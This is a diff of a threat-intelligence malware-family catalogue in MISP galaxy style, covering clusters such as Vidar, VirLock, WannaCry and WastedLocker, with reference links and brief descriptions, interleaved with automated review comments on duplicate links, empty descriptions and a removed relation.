- "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://eln0ty.github.io/malware%20analysis/vidar/",
- "https://intel471.com/blog/privateloader-malware",
"https://isc.sans.edu/diary/rss/28468",
- "https://asec.ahnlab.com/en/22932/",
- "https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/",
- "https://cert.pl/en/posts/2021/10/vidar-campaign/",
- "https://threatpost.com/microsoft-help-files-vidar-malware/179078/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/vidar-malware-launcher-concealed-in-help-file/",
- "https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d",
- "https://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/",
- "https://asec.ahnlab.com/en/30875/",
- "https://twitter.com/sisoma2/status/1409816282065743872",
- "https://asec.ahnlab.com/ko/25837/",
"https://ke-la.com/information-stealers-a-new-landscape/",
- "https://www.bleepingcomputer.com/news/security/fake-pixelmon-nft-site-infects-you-with-password-stealing-malware/"
+ "https://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/",
+ "https://blog.jaalma.io/vidar-infostealer-analysis/",
+ "https://www.esentire.com/blog/batloader-continues-to-abuse-google-search-ads-to-deliver-vidar-stealer-and-ursnif",
+ "https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper",
+ "https://intel471.com/blog/privateloader-malware",
+ "https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d",
+ "https://kienmanowar.wordpress.com/2022/12/17/quicknote-vidarstealer-analysis/",
+ "https://tccontre.blogspot.com/2019/03/infor-stealer-vidar-trojanspy-analysis.html",
+ "https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html",
+ "https://www.bleepingcomputer.com/news/security/fake-pixelmon-nft-site-infects-you-with-password-stealing-malware/",
+ "https://twitter.com/GroupIB_GIB/status/1570821174736850945",
+ "https://eln0ty.github.io/malware%20analysis/vidar/",
+ "https://asec.ahnlab.com/ko/25837/",
+ "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign",
+ "https://asec.ahnlab.com/en/22932/",
+ "https://asec.ahnlab.com/en/30445/",
+ "https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/",
+ "https://www.cynet.com/blog/cyops-lighthouse-vidar-stealer/",
+ "https://blog.minerva-labs.com/vidar-stealer-evasion-arsenal",
+ "https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/",
+ "https://blog.cyble.com/2022/11/08/massive-youtube-campaign-targeting-over-100-applications-to-deliver-info-stealer/",
+ "https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468",
+ "https://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed",
+ "https://asec.ahnlab.com/en/30875/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://twitter.com/sisoma2/status/1409816282065743872",
+ "https://cert.pl/en/posts/2021/10/vidar-campaign/",
+ "https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/",
+ "https://www.youtube.com/watch?v=lxdlNOaHJQA",
+ "https://www.csoonline.com/article/3654849/microsoft-help-files-repurposed-to-contain-vidar-malware-in-new-campaign.html",
+ "https://www.zscaler.com/blogs/security-research/vidar-distributed-through-backdoored-windows-11-downloads-and-abusing",
+ "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
+ "https://www.team-cymru.com/post/darth-vidar-the-dark-side-of-evolving-threat-infrastructure",
+ "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware",
+ "https://community.emergingthreats.net/t/vidar-stealer-picks-up-steam/271",
+ "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
+ "https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/vidar-malware-launcher-concealed-in-help-file/",
+ "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/",
+ "https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem",
+ "https://darktrace.com/blog/vidar-info-stealer-malware-distributed-via-malvertising-on-google",
+ "https://docs.google.com/spreadsheets/d/1nx42rdMdkCrvlmACDi3CHseyG87iSV1Y6rGZYq_-oDk",
+ "https://blog.malwarebytes.com/threat-analysis/2019/01/vidar-gandcrab-stealer-and-ransomware-combo-observed-in-the-wild/",
+ "https://www.youtube.com/watch?v=NI_Yw2t9zoo",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://www.quorumcyber.com/wp-content/uploads/2023/01/Malware-Analysis-Vidar.pdf",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://malwarology.substack.com/p/malicious-packer-pkr_ce1a?r=1lslzd",
+ "https://www.kroll.com/en/insights/publications/cyber/threat-actors-google-ads-deploy-vidar-stealer",
+ "https://threatpost.com/microsoft-help-files-vidar-malware/179078/"
],
"synonyms": [],
"type": []
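Review bot: the Vidar refs now contain the same ISC diary twice: the retained context line "https://isc.sans.edu/diary/rss/28468" and the added "https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468" both resolve to diary entry 28468. Keep one (the titled URL is the more descriptive) so consumers that count or dedupe references per cluster are not skewed. The rest of the hunk is mostly a reorder of already-present links around roughly twenty genuinely new ones, which makes the new material hard to spot in review.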
@@ -47014,11 +49649,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vigilant_cleaner",
- "https://blog.trendmicro.co.jp/archives/28319",
- "https://www.mbsd.jp/research/20210721/blog/",
"https://blog.cyble.com/2021/08/02/a-deep-dive-analysis-of-a-new-wiper-malware-disguised-as-tokyo-olympics-document/",
+ "https://blog.trendmicro.co.jp/archives/28319",
"https://www.fortinet.com/blog/threat-research/wiper-malware-riding-tokyo-olympic-games",
- "https://therecord.media/wiper-malware-targeting-japanese-pcs-discovered-ahead-of-tokyo-olympics-opening/"
+ "https://therecord.media/wiper-malware-targeting-japanese-pcs-discovered-ahead-of-tokyo-olympics-opening/",
+ "https://www.mbsd.jp/research/20210721/blog/"
],
"synonyms": [
"VIGILANT CHECKER"
@@ -47041,18 +49676,48 @@
"uuid": "30161733-993f-4a1c-bcc5-7b4f1cd7d9e4",
"value": "virdetdoor"
},
+ {
+ "description": "Polymorphic parasitic file infecting virus which transforms files into copies of itself. Additionally it uses screen-locking as a ransomware technique.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.virlock",
+ "https://www.ciberseguridad.eus/sites/default/files/2022-04/bcsc-malware-virlock-tlpwhite_v1242.pdf",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-january-14-29-2017",
+ "https://www.welivesecurity.com/2014/12/22/win32virlock-first-self-reproducing-ransomware-also-shape-shifter/",
+ "https://blogs.blackberry.com/en/2019/07/threat-spotlight-virlock-polymorphic-ransomware",
+ "https://www.virusbulletin.com/virusbulletin/2016/12/vb2015-paper-its-file-infector-its-ransomware-its-virlock/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "86ea83f1-c06c-4ee3-9c4e-df302974f649",
+ "value": "VirLock"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.virtualgate",
+ "https://norfolkinfosec.com/some-notes-on-virtualgate/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "48d47a27-464a-4087-b691-574c3b494efb",
+ "value": "VIRTUALGATE"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.virut",
- "https://chrisdietri.ch/post/virut-resurrects/",
- "https://www.mandiant.com/resources/pe-file-infecting-malware-ot",
- "https://blog.malwarebytes.com/threat-analysis/2018/03/blast-from-the-past-stowaway-virut-delivered-with-chinese-ddos-bot/",
- "https://www.theregister.co.uk/2018/01/10/taiwanese_police_malware/",
- "https://securelist.com/review-of-the-virus-win32-virut-ce-malware-sample/36305/",
- "https://krebsonsecurity.com/2013/01/polish-takedown-targets-virut-botnet/",
"https://www.secureworks.com/research/virut-encryption-analysis",
+ "https://www.theregister.co.uk/2018/01/10/taiwanese_police_malware/",
+ "https://www.mandiant.com/resources/pe-file-infecting-malware-ot",
+ "https://chrisdietri.ch/post/virut-resurrects/",
+ "https://krebsonsecurity.com/2013/01/polish-takedown-targets-virut-botnet/",
+ "https://securelist.com/review-of-the-virus-win32-virut-ce-malware-sample/36305/",
+ "https://blog.malwarebytes.com/threat-analysis/2018/03/blast-from-the-past-stowaway-virut-delivered-with-chinese-ddos-bot/",
"https://www.spamhaus.org/news/article/690/cooperative-efforts-to-shut-down-virut-botnet"
],
"synonyms": [],
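Review bot: the new VIRTUALGATE cluster ships with an empty "description" while VirLock, added in the same hunk, gets a proper summary. If the upstream Malpedia entry or the linked norfolkinfosec write-up has a one-line characterisation, carry it over so the cluster is findable by behaviour rather than only by name. In the VirLock description, "Additionally it uses screen-locking" wants a comma after "Additionally".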
@@ -47079,15 +49744,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vjw0rm",
- "https://community.riskiq.com/article/24759ad2",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf",
- "https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel",
- "https://appriver.com/resources/blog/november-2020/vjw0rm-back-new-tactics",
"https://twitter.com/tccontre18/status/1461386178528264204",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf",
+ "https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
"https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape",
+ "https://resources.securityscorecard.com/research/acasestudyofVjw0rm#page=1",
+ "https://community.riskiq.com/article/24759ad2",
+ "https://appriver.com/resources/blog/november-2020/vjw0rm-back-new-tactics",
"https://bazaar.abuse.ch/browse/signature/Vjw0rm/",
- "https://lifars.com/wp-content/uploads/2021/09/Vjw0rm-.pdf",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf"
+ "https://lifars.com/wp-content/uploads/2021/09/Vjw0rm-.pdf"
],
"synonyms": [],
"type": []
@@ -47100,8 +49767,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vmzeus",
- "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/",
- "https://securityintelligence.com/new-zberp-trojan-discovered-zeus-zbot-carberp/"
+ "https://securityintelligence.com/new-zberp-trojan-discovered-zeus-zbot-carberp/",
+ "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/"
],
"synonyms": [
"VMzeus",
@@ -47114,12 +49781,12 @@
"value": "VM Zeus"
},
{
- "description": "",
+ "description": "Malware of this family searches for computers on a network and creates copies of itself in folders with open access. For the program to be activated, the user must first run it on the computer. The code of this malware is written in the Visual Basic programming language and uses obfuscation, which is a distinguishing feature of this family. Code obfuscation complicates attempts by anti-virus software to analyze suspected malware.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vobfus",
- "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/151/beebone-botnet-takedown-trend-micro-solutions",
"https://blog.trendmicro.com/trendlabs-security-intelligence/whats-the-fuss-with-worm_vobfus/",
+ "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/151/beebone-botnet-takedown-trend-micro-solutions",
"http://contagiodump.blogspot.com/2012/12/nov-2012-worm-vobfus-samples.html"
],
"synonyms": [
@@ -47130,6 +49797,20 @@
"uuid": "60f7b1b9-c283-4395-909f-7b8b1731e840",
"value": "Vobfus"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vohuk",
+ "https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-vohuk-scarecrow-and-aerst-variants",
+ "https://github.com/MalGamy/YARA_Rules/blob/main/vohuk.yara"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "f2c91bfb-1b22-4399-849a-f07304c2e81f",
+ "value": "Vohuk"
+ },
{
"description": "Ransomware.",
"meta": {
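Review bot: the Vohuk refs include "https://github.com/MalGamy/YARA_Rules/blob/main/vohuk.yara", a link pinned to the moving `main` branch rather than to a commit. A file on a branch can be renamed or deleted and the reference silently breaks; prefer a commit permalink (the `/blob/<commit-sha>/` form) for repository files cited as evidence. The empty "description" follows the same convention as the other entries without a summary, so no objection there.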
@@ -47151,16 +49832,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.volgmer",
+ "https://securelist.com/lazarus-threatneedle/100803/",
+ "https://www.us-cert.gov/ncas/alerts/TA17-318B",
+ "https://drive.google.com/file/d/1XoGQFEJQ4nFAUXSGwcnTobviQ_ms35mG/view",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://securelist.com/apt-trends-report-q2-2020/97937/",
+ "https://securelist.com/the-lazarus-group-deathnote-campaign/109490/",
+ "https://lifars.com/wp-content/uploads/2021/09/Lazarus.pdf",
+ "https://securelist.com/operation-applejeus/87553/",
"https://drive.google.com/file/d/1lq0Sjw4FKBxf017Ss7W7uGMvs7CgFzcA/view",
"https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "https://securelist.com/lazarus-threatneedle/100803/",
"https://www.secureworks.com/research/threat-profiles/nickel-academy",
- "https://securelist.com/apt-trends-report-q2-2020/97937/",
- "https://www.us-cert.gov/ncas/alerts/TA17-318B",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://securelist.com/operation-applejeus/87553/",
- "https://drive.google.com/file/d/1XoGQFEJQ4nFAUXSGwcnTobviQ_ms35mG/view",
- "https://lifars.com/wp-content/uploads/2021/09/Lazarus.pdf",
"https://medium.com/s2wlab/analysis-of-threatneedle-c-c-communication-feat-google-tag-warning-to-researchers-782aa51cf74"
],
"synonyms": [
@@ -47169,15 +49851,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "0a52e73b-d7e9-45ae-9bda-46568f753931",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "bbfd4fb4-3e5a-43bf-b4bb-eaf5ef4fb25f",
"value": "Volgmer"
},
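Review bot: this hunk removes the Volgmer "related" block, which carried a "similar" relation to dest-uuid "0a52e73b-d7e9-45ae-9bda-46568f753931" with an "almost-certain" estimative-language tag, and nothing in the visible diff adds it back. Dropping a cross-cluster relation is a content change, not a reorder, so it deserves a sentence in the commit message stating whether the relation was retired upstream or is now recorded elsewhere; otherwise downstream MISP instances lose a correlation edge without explanation.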
@@ -47186,8 +49859,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vovalex",
- "https://twitter.com/malwrhunterteam/status/1351808079164276736",
- "https://twitter.com/VK_Intel/status/1355196321964109824"
+ "https://twitter.com/VK_Intel/status/1355196321964109824",
+ "https://twitter.com/malwrhunterteam/status/1351808079164276736"
],
"synonyms": [],
"type": []
@@ -47213,6 +49886,7 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vsingle",
+ "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
"https://blogs.jpcert.or.jp/en/2022/07/vsingle.html",
"https://blogs.jpcert.or.jp/en/2021/03/Lazarus_malware3.html"
],
@@ -47227,9 +49901,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vskimmer",
+ "http://vkremez.weebly.com/cyber-security/-backdoor-win32hesetoxa-vskimmer-pos-malware-analysis",
"http://www.xylibox.com/2013/01/vskimmer.html",
- "https://securingtomorrow.mcafee.com/mcafee-labs/vskimmer-botnet-targets-credit-card-payment-terminals/",
- "http://vkremez.weebly.com/cyber-security/-backdoor-win32hesetoxa-vskimmer-pos-malware-analysis"
+ "https://securingtomorrow.mcafee.com/mcafee-labs/vskimmer-botnet-targets-credit-card-payment-terminals/"
],
"synonyms": [],
"type": []
@@ -47294,42 +49968,43 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor",
- "https://securelist.com/big-threats-using-code-similarity-part-1/97239/",
- "https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/",
- "https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168",
- "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
- "https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
- "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group",
- "https://www.malwaretech.com/2017/05/how-to-accidentally-stop-a-global-cyber-attacks.html",
- "https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
"https://www.youtube.com/watch?v=Q90uZS3taG0",
- "https://news.sophos.com/en-us/2019/09/18/the-wannacry-hangover/",
- "https://sites.temple.edu/care/ci-rw-attacks/",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/",
- "http://blog.emsisoft.com/2017/05/12/wcry-ransomware-outbreak/",
- "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/WannaCry-Aftershock.pdf",
- "https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf",
- "https://blog.comae.io/wannacry-new-variants-detected-b8908fefea7e",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://securelist.com/big-threats-using-code-similarity-part-1/97239/",
"https://swanleesec.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-1",
- "https://blog.gdatasoftware.com/2017/05/29751-wannacry-ransomware-campaign",
- "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware",
- "https://www.flashpoint-intel.com/blog/linguistic-analysis-wannacry-ransomware/",
- "http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html",
- "https://www.microsoft.com/security/blog/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/",
- "https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html",
"https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d",
- "https://github.com/0xZuk0/rules-of-yaras/blob/main/reports/Wannacry%20Ransomware%20Report.pdf",
- "https://metaswan.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-1",
- "https://themoscowtimes.com/news/wcry-virus-reportedly-infects-russian-interior-ministrys-computer-network-57984",
- "https://dissectingmalwa.re/third-times-the-charm-analysing-wannacry-samples.html",
+ "https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/",
"https://krebsonsecurity.com/2017/05/u-k-hospitals-hit-in-widespread-ransomware-attack/",
+ "https://www.microsoft.com/security/blog/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/",
+ "https://metaswan.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-1",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168",
"https://blog.comae.io/wannacry-the-largest-ransom-ware-infection-in-history-f37da8e30a58",
+ "https://blog.gdatasoftware.com/2017/05/29751-wannacry-ransomware-campaign",
+ "https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/",
+ "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
"https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf",
- "https://www.il-pib.pl/czasopisma/JTIT/2019/1/113.pdf"
+ "http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170728/Guerrero-Saade-Raiu-VB2017.pdf",
+ "https://sites.temple.edu/care/ci-rw-attacks/",
+ "https://dissectingmalwa.re/third-times-the-charm-analysing-wannacry-samples.html",
+ "https://blog.comae.io/wannacry-new-variants-detected-b8908fefea7e",
+ "https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf",
+ "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/WannaCry-Aftershock.pdf",
+ "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group",
+ "https://www.flashpoint-intel.com/blog/linguistic-analysis-wannacry-ransomware/",
+ "https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html",
+ "https://www.il-pib.pl/czasopisma/JTIT/2019/1/113.pdf",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://themoscowtimes.com/news/wcry-virus-reportedly-infects-russian-interior-ministrys-computer-network-57984",
+ "https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/",
+ "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware",
+ "https://www.malwaretech.com/2017/05/how-to-accidentally-stop-a-global-cyber-attacks.html",
+ "http://blog.emsisoft.com/2017/05/12/wcry-ransomware-outbreak/",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://news.sophos.com/en-us/2019/09/18/the-wannacry-hangover/",
+ "https://github.com/0xZuk0/rules-of-yaras/blob/main/reports/Wannacry%20Ransomware%20Report.pdf"
],
"synonyms": [
"Wana Decrypt0r",
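Review bot: the WannaCry hunk keeps two refs that are the same post under two hosts, "https://swanleesec.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-1" (context) and "https://metaswan.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-1" (removed and re-added). Keep whichever host is current and drop the other. Apart from that, the only net addition in roughly 40 changed lines is the Kaspersky VB2017 paper, so the reorder noise dominates the signal.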
@@ -47387,53 +50062,53 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.wastedlocker",
- "https://ioc.hatenablog.com/entry/2020/08/16/132853",
- "https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/",
- "https://labs.sentinelone.com/wastedlocker-ransomware-abusing-ads-and-ntfs-file-attributes/",
- "https://symantec.broadcom.com/hubfs/SED-Threats-Financial-Sector.pdf",
- "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
- "https://blog.malwarebytes.com/threat-spotlight/2020/07/threat-spotlight-wastedlocker-customized-ransomware/",
- "https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html",
- "https://unit42.paloaltonetworks.com/atoms/wastedlocker-ransomware/",
- "https://unit42.paloaltonetworks.com/wastedlocker/",
- "https://www.securonix.com/web/wp-content/uploads/2020/08/Securonix_Threat_Research_WastedLocker_Ransomware.pdf",
- "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
- "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
+ "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
"https://securelist.com/wastedlocker-technical-analysis/97944/",
- "https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf",
- "https://blog.talosintelligence.com/2020/07/wastedlocker-emerges.html",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
"https://seguranca-informatica.pt/wastedlocker-malware-analysis/#.YfAaIRUITTY.twitter",
+ "https://www.bbc.com/news/world-us-canada-53195749",
"https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us",
- "https://www.bleepingcomputer.com/news/security/evil-corp-switches-to-hades-ransomware-to-evade-sanctions/",
- "https://kc.mcafee.com/corporate/index?page=content&id=KB93302&locale=en_US",
- "https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp",
- "https://areteir.com/wp-content/uploads/2020/07/Ransomware-WastedLocker-1.pdf",
+ "https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/",
+ "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/397/Bitdefender-PR-Whitepaper-RIG-creat5362-en-EN.pdf",
+ "https://blog.talosintelligence.com/2020/07/wastedlocker-emerges.html",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://killingthebear.jorgetesta.tech/actors/evil-corp",
+ "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/",
"https://news.sophos.com/en-us/2020/08/04/wastedlocker-techniques-point-to-a-familiar-heritage/",
+ "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf",
+ "https://www.sentinelone.com/labs/sanctions-be-damned-from-dridex-to-macaw-the-evolution-of-evil-corp/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf",
+ "https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html",
+ "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
+ "https://unit42.paloaltonetworks.com/atoms/wastedlocker-ransomware/",
+ "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
+ "https://ioc.hatenablog.com/entry/2020/08/16/132853",
+ "https://kc.mcafee.com/corporate/index?page=content&id=KB93302&locale=en_US",
+ "https://www.bleepingcomputer.com/news/security/evil-corp-switches-to-hades-ransomware-to-evade-sanctions/",
+ "https://www.securonix.com/web/wp-content/uploads/2020/08/Securonix_Threat_Research_WastedLocker_Ransomware.pdf",
+ "https://symantec.broadcom.com/hubfs/SED-Threats-Financial-Sector.pdf",
+ "https://unit42.paloaltonetworks.com/wastedlocker/",
+ "https://blog.malwarebytes.com/threat-spotlight/2020/07/threat-spotlight-wastedlocker-customized-ransomware/",
"http://www.secureworks.com/research/threat-profiles/gold-drake",
"https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/",
"https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/",
- "https://www.sentinelone.com/labs/sanctions-be-damned-from-dridex-to-macaw-the-evolution-of-evil-corp/",
